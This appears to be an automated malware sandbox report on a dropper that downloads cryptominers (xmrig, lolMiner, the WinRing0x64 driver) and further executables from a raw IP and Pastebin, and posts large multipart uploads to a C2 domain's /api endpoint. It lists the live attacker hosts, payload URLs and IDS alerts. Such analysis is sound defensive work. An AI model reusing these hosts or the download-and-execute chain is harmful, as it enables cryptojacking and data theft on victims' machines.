00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49761 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49744 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49751 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49798 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49808 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49769 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49824 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49781 -> 104.21.39.3:443
                  Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.9:49933 -> 147.45.47.81:80
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49827
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49990
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YH0BNR3A0387TVJW2VMZ6BT8IM30NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12918Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R70UTMJN4BNJ5HHTW61QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2E9ELY5C6EUNUUQW6CTIZRXBSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20628Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y4PZIGXVNR2G30NYMQWV6G2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1288Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=77DTF4HWE1MXD9HP644Y5Y922Y12ARZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585027Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                  Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E1280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,26_2_004E1280
                  Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                  Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: pragapin.sbs
                  Source: global trafficDNS traffic detected: DNS query: joxi.net
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pragapin.sbs
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 10 Nov 2024 08:18:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 8e049cf74bf7e5fa-DFW
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=vjY5gKPPXOMIQKvyKrW2EJJA%2CpvU4bx9DRj-nkSFZwu2oF6aAwimON-1ChrMTUv0LwGMMC5KnqpiGxrjHTwp30; path=/Cache-Control: no-cacheDate: Sun, 10 Nov 2024 08:18:36 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 00 00 0d 0a Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ W
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exe
                  Source: Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exeP
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sys
                  Source: Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sysChttps://pastebin.com/raw/dq3hWX27
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sysP
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595737127.0000000003068000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe.
                  Source: PqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exep
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/lolMiner.exe
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/xmrig.exe
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/xmrig.exeP
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81D
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Installer.exe.24.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.000000000320E000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.28.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                  Source: powershell.exe, 0000001F.00000002.1705359878.0000000008139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                  Source: Installer.exe.24.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                  Source: Installer.exe.24.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000001A.00000002.1666374640.00000000004F4000.00000002.00000001.01000000.00000009.sdmp, Installer.exe.24.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3/
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3U
                  Source: Installer.exe, 0000001A.00000000.1648420574.00000000004F4000.00000002.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000002.1666374640.00000000004F4000.00000002.00000001.01000000.00000009.sdmp, Installer.exe.24.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
                  Source: powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Installer.exe.24.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.24.dr, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.00000000030EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.00000000030EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1694523421.0000000004A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
